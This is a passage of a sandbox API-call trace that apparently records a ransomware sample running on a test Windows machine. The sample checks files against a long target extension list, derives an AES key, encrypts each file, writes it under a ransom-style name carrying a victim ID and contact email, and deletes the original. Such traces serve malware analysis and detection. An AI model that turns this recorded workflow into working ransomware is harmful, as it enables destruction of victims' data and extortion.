	[0192.663] CryptEncrypt (in: hKey=0xfb92f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x74b5, dwBufLen=0x74b5 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x74c0) returned 1
	[0192.664] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0192.664] RtlMoveMemory (in: Destination=0xfe4640, Source=0xfdd180, Length=0x74b5 | out: Destination=0xfe4640) 
	[0192.664] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.664] CryptEncrypt (in: hKey=0xfb92f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe4640*, pdwDataLen=0x18aefc*=0x74b5, dwBufLen=0x74c0 | out: pbData=0xfe4640*, pdwDataLen=0x18aefc*=0x74c0) returned 1
	[0192.664] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.664] CryptDestroyKey (hKey=0xfb92f0) returned 1
	[0192.665] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.665] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0192.665] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.665] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0192.665] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0192.665] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0192.666] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.666] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0192.667] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\tcbfftgd3-w7dzc.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 106
	[0192.667] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\tcbfftgd3-w7dzc.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\tcbfftgd3-w7dzc.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0192.668] WriteFile (in: hFile=0x388, lpBuffer=0xfe4640*, nNumberOfBytesToWrite=0x74c0, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfe4640*, lpNumberOfBytesWritten=0x18b358*=0x74c0, lpOverlapped=0x0) returned 1
	[0192.672] CloseHandle (hObject=0x388) returned 1
	[0192.672] CloseHandle (hObject=0x2c0) returned 1
	[0192.672] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\tcbfftgd3-w7dzc.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\tcbfftgd3-w7dzc.m4a")) returned 1
	[0192.679] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\tcbfftgd3-w7dzc.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\tcbfftgd3-w7dzc.m4a")) returned 0
	[0192.680] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x459b10, ftCreationTime.dwHighDateTime=0x1d9763b, ftLastAccessTime.dwLowDateTime=0x5b70c810, ftLastAccessTime.dwHighDateTime=0x1d97641, ftLastWriteTime.dwLowDateTime=0x5b70c810, ftLastWriteTime.dwHighDateTime=0x1d97641, nFileSizeHigh=0x0, nFileSizeLow=0x576a, dwReserved0=0x0, dwReserved1=0x0, cFileName="zIwxnLOvm1.wav", cAlternateFileName="ZIWXNL~1.WAV")) returned 1
	[0192.680] lstrcmpW (lpString1="zIwxnLOvm1.wav", lpString2="..") returned 1
	[0192.680] lstrcmpW (lpString1="zIwxnLOvm1.wav", lpString2=".") returned 1
	[0192.680] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\"
	[0192.680] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\", lpString2="zIwxnLOvm1.wav" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\zIwxnLOvm1.wav") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\zIwxnLOvm1.wav"
	[0192.680] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\zIwxnLOvm1.wav") returned 59
	[0192.680] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0192.681] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\zIwxnLOvm1.wav", cchLength=0x3b | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\ziwxnlovm1.wav") returned 0x3b
	[0192.681] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.681] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\ziwxnlovm1.wav", lpSrch="help_decrypt_your_files") returned 0x0
	[0192.681] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\ziwxnlovm1.wav" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\ziwxnlovm1.wav") returned="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\ziwxnlovm1.wav"
	[0192.681] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\ziwxnlovm1.wav") returned 59
	[0192.681] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0192.681] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.682] StrStrW (lpFirst=".wav", lpSrch=".") returned=".wav"
	[0192.682] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.682] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".wav") returned=".wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0192.682] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0192.682] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0192.682] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\ziwxnlovm1.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\ziwxnlovm1.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0192.686] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x576a, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x576a, lpOverlapped=0x0) returned 1
	[0192.689] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.689] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb330) returned 1
	[0192.692] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.692] CryptCreateHash (in: hProv=0xfcb330, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0192.692] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.692] CryptHashData (hHash=0xfb9830, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0192.692] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.692] CryptDeriveKey (in: hProv=0xfcb330, Algid=0x6610, hBaseData=0xfb9830, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb9670) returned 1
	[0192.692] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.693] CryptEncrypt (in: hKey=0xfb9670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x576a, dwBufLen=0x576a | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x5770) returned 1
	[0192.693] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0192.693] RtlMoveMemory (in: Destination=0xfe28f8, Source=0xfdd180, Length=0x576a | out: Destination=0xfe28f8) 
	[0192.693] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.694] CryptEncrypt (in: hKey=0xfb9670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe28f8*, pdwDataLen=0x18aefc*=0x576a, dwBufLen=0x5770 | out: pbData=0xfe28f8*, pdwDataLen=0x18aefc*=0x5770) returned 1
	[0192.694] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.694] CryptDestroyKey (hKey=0xfb9670) returned 1
	[0192.694] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.694] CryptDestroyHash (hHash=0xfb9830) returned 1
	[0192.694] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.695] CryptReleaseContext (hProv=0xfcb330, dwFlags=0x0) returned 1
	[0192.695] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0192.695] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0192.696] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.696] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0192.698] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\ziwxnlovm1.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 101
	[0192.698] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\ziwxnlovm1.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\ziwxnlovm1.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0192.698] WriteFile (in: hFile=0x388, lpBuffer=0xfe28f8*, nNumberOfBytesToWrite=0x5770, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfe28f8*, lpNumberOfBytesWritten=0x18b358*=0x5770, lpOverlapped=0x0) returned 1
	[0192.702] CloseHandle (hObject=0x388) returned 1
	[0192.702] CloseHandle (hObject=0x2c0) returned 1
	[0192.702] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\ziwxnlovm1.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\ziwxnlovm1.wav")) returned 1
	[0192.708] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\ziwxnlovm1.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\ziwxnlovm1.wav")) returned 0
